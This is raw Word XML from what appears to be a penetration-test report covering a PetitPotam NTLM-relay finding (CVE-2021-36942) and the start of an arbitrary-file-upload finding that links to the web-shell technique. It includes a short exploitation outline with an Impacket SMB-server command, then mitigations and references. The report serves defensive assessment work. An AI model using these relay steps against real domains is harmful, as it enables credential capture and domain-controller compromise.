      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="0070C0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="28DBF244" w14:textId="644A2AD0">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="0BC5E380" w:rsidP="0D325B6E" w:rsidRDefault="0BC5E380" w14:paraId="4CFD1CDF" w14:textId="454551AF">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0BC5E380">
        <w:rPr>
          <w:rFonts w:ascii="Aptos Display" w:hAnsi="Aptos Display" w:eastAsia="Aptos Display" w:cs="Aptos Display"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="660000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>▌</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0BC5E3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C1:  PetitPotam</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0ADDE211">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F548471" w14:textId="317D419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5E1877F" w14:textId="36F8A88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01EEE05" w14:textId="57893CA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C0669AC">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03E8DFB" w14:textId="4BC7ED3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16FA4401" w14:textId="57DEC81D">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Critical</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9D0F8D8" w14:textId="55FC8F2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10.0</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60000"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="6EBBDF65" w14:textId="69101355">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Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="0C9E1115">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3C6254E" w14:textId="794246A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FD54058" w14:textId="3CE9D5D8">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7EAD2866"/>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C01421E"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="61AF30C2">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FC7671E" w14:textId="112A09E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66191E0" w14:textId="6A5A2D7E">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" r:id="R996ca15a8cea4574">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="7313B53C">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3E6BCFC" w14:textId="435269B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BBC734" w14:textId="0B445969">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6129A86" w14:textId="0126EF33">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R68e1aa2c0b824116">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">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0D325B6E" w:rsidTr="0D325B6E" w14:paraId="264A1F6A">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12585D6A"/>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803EF7" w14:textId="5306425C">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3C8AC42" w14:textId="107F8060">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R119a545f904f42fa">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>M1051: Update Software</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="1B6BEE9D">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8EB224" w14:textId="242044D1">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3152914" w14:textId="1EB1FD54">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4B00B9FC" w14:textId="0821FF06">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BC5E380" w:rsidP="0D325B6E" w:rsidRDefault="0BC5E380" w14:paraId="49286E8E" w14:textId="0CF2162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BC5E380" w:rsidP="0D325B6E" w:rsidRDefault="0BC5E380" w14:paraId="6E0FEA39" w14:textId="1D24360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The affected host is vulnerable to CVE-2021-36942 (</w:t>
      </w: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PetitPotam</w:t>
      </w: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This vulnerability forces the </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0565C0C9">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w:t>
      </w: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indows host to authenticate to an attacker</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="569EFC67">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controlled NTLM server, allowing the</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0267AF2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m</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0BC5E380">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to relay the authentication request to compromise the domain controller.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="643E03F6" w14:textId="5AB995E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BC5E380" w:rsidP="0D325B6E" w:rsidRDefault="0BC5E380" w14:paraId="787BC30E" w14:textId="5A8ED3A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BC5E380" w:rsidP="0D325B6E" w:rsidRDefault="0BC5E380" w14:paraId="3F4A6294" w14:textId="4EEF3A6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operational disruptions, as an attacker can take control of the domain, taking down critical infrastructure that APT needs for its business and cruise operations.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="6AA2CB2B" w14:textId="1F538DD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BC5E380" w:rsidP="0D325B6E" w:rsidRDefault="0BC5E380" w14:paraId="58ABB853" w14:textId="2B1C0A6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BC5E380" w:rsidP="0D325B6E" w:rsidRDefault="0BC5E380" w14:paraId="5E6098A5" w14:textId="1A4C3AC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Step 1: Start an SMB server:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0BC5E380" w:rsidP="0D325B6E" w:rsidRDefault="0BC5E380" w14:paraId="6C89B868" w14:textId="1E73D0A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Impacket-smbserver</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share .</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 -smb2support</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0BC5E380" w:rsidP="0D325B6E" w:rsidRDefault="0BC5E380" w14:paraId="41AFA137" w14:textId="27CA4B7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Step 2: Run the </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="42BC5BA9">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etit</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="50519085">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otam attack.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0BC5E380" w:rsidP="0D325B6E" w:rsidRDefault="0BC5E380" w14:paraId="329FB79F" w14:textId="23E0B34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Step 3: Capture </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1CF13D9B">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authentication request </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="09351B01">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>on</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 the SMB server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="726DB5C9" w14:textId="5DB0148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BC5E380" w:rsidP="0D325B6E" w:rsidRDefault="0BC5E380" w14:paraId="72E9B418" w14:textId="1041D17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BC5E380" w:rsidP="0D325B6E" w:rsidRDefault="0BC5E380" w14:paraId="65ACFF1B" w14:textId="33D374E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BC5E380" w:rsidP="0D325B6E" w:rsidRDefault="0BC5E380" w14:paraId="2653A3A2" w14:textId="2864C483">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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Disable NTLM authentication on the Domain Controller</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="127258D6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0BC5E380" w:rsidP="0D325B6E" w:rsidRDefault="0BC5E380" w14:paraId="1FF2AA38" w14:textId="7E30A711">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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Disable NTLM authentication on ADCS servers using group policy.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0BC5E380" w:rsidP="0D325B6E" w:rsidRDefault="0BC5E380" w14:paraId="4DDD2A0C" w14:textId="418F0450">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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Install </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="2422F7D3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">the latest </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Microsoft</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="750040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4AFC45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 xml:space="preserve">ecurity updates </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="2A4E6D36">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">which will address </w:t>
      </w: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NTLM relaying issues</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5AD2E20E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0BC5E380" w:rsidP="0D325B6E" w:rsidRDefault="0BC5E380" w14:paraId="4EF79845" w14:textId="7FF5180A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Enable SMB Signing to prevent NTLM relaying.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="1AD95DEF" w14:textId="7E4016B6">
      <w:pPr>
        <w:bidi w:val="0"/>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0BC5E380" w:rsidP="0D325B6E" w:rsidRDefault="0BC5E380" w14:paraId="6A9BE94B" w14:textId="245DDB6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C5E38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BC5E380" w:rsidP="0D325B6E" w:rsidRDefault="0BC5E380" w14:paraId="03254CE0" w14:textId="71A6343E">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70C0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="R8c78e3bfa7784039">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="0BC5E380">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:caps w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:strike w:val="0"/>
            <w:dstrike w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Microsoft - Mitigating NTLM Relay Attacks on ADCS</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0BC5E380" w:rsidP="0D325B6E" w:rsidRDefault="0BC5E380" w14:paraId="5759A2C3" w14:textId="000501AD">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="279" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="Rd054d49c6e7a49f7">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="0BC5E380">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:caps w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:strike w:val="0"/>
            <w:dstrike w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Rapid7 - PetitPotam Security Advisory</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="0770832A" w14:textId="206A91FA">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="24B1F88F" w14:textId="06398D7B">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="2FDE3999" w:rsidP="0D325B6E" w:rsidRDefault="2FDE3999" w14:paraId="07144E47" w14:textId="3E59C516">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="002060"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="2FDE3999">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="002060"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>High</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6FA8FF3E" w:rsidP="0D325B6E" w:rsidRDefault="6FA8FF3E" w14:paraId="602F6880" w14:textId="183EEEF5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc92669295" w:id="1614958789"/>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6FA8FF3E">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>▌</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7BAF9F6A">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>H</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6FA8FF3E">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1:</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6FA8FF3E">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc603830957" w:id="1196955500"/>
      <w:bookmarkStart w:name="_Toc122671318" w:id="1018188673"/>
      <w:bookmarkStart w:name="_Toc1125716277" w:id="1986205335"/>
      <w:bookmarkStart w:name="_Toc1681866357" w:id="430728994"/>
      <w:bookmarkStart w:name="_Toc730692438" w:id="805659875"/>
      <w:bookmarkStart w:name="_Toc69777453" w:id="2095900735"/>
      <w:bookmarkStart w:name="_Toc230801359" w:id="1614801722"/>
      <w:bookmarkStart w:name="_Toc1145237063" w:id="1634958337"/>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7E60F6A5">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Arbitrary File Upload</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1614958789"/>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="233FC404">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="2095900735"/>
      <w:bookmarkEnd w:id="1614801722"/>
      <w:bookmarkEnd w:id="1634958337"/>
      <w:bookmarkEnd w:id="1196955500"/>
      <w:bookmarkEnd w:id="1018188673"/>
      <w:bookmarkEnd w:id="1986205335"/>
      <w:bookmarkEnd w:id="430728994"/>
      <w:bookmarkEnd w:id="80565987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7B243D4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747F2A" w14:textId="4C77274F">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8EE44AC" w14:textId="4FF0D03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7F448D" w14:textId="53A3BA0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A970A9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A2FEEB" w14:textId="532701D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C37C6CA" w14:textId="1239565A">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775338D" w14:textId="180B05AA">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8.7</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4BC183B" w14:textId="0036DFF4">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05E82D3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1103A9" w14:textId="36BDED6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82755F9" w14:textId="58CE2C1A">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1431A00"/>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6B0612D"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="7B3C83F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D0E4A30" w14:textId="0A7061C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363259C" w14:textId="19259438">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:noProof w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:u w:val="none"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" r:id="R49688eee09c642d7">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>AV:N/AC:L/A</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>T:N/PR:L/</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>UI:N/VC:H/</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>VI:H/VA:</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>H/SC:N/SI:N</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>/SA:N</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="36B9DB20">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0ABFEE" w14:textId="221D1C5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B4ED814" w14:textId="3FCF45A5">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64B8E20" w14:textId="465D28C1">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="0070C0"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="Rd48cd0e0a93a49c8">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>T1505.003</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Server Software Component - </w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Web Shell</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="5CB48D6A" w14:textId="5F24A041">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:jc w:val="center"/>
              <w:rPr>
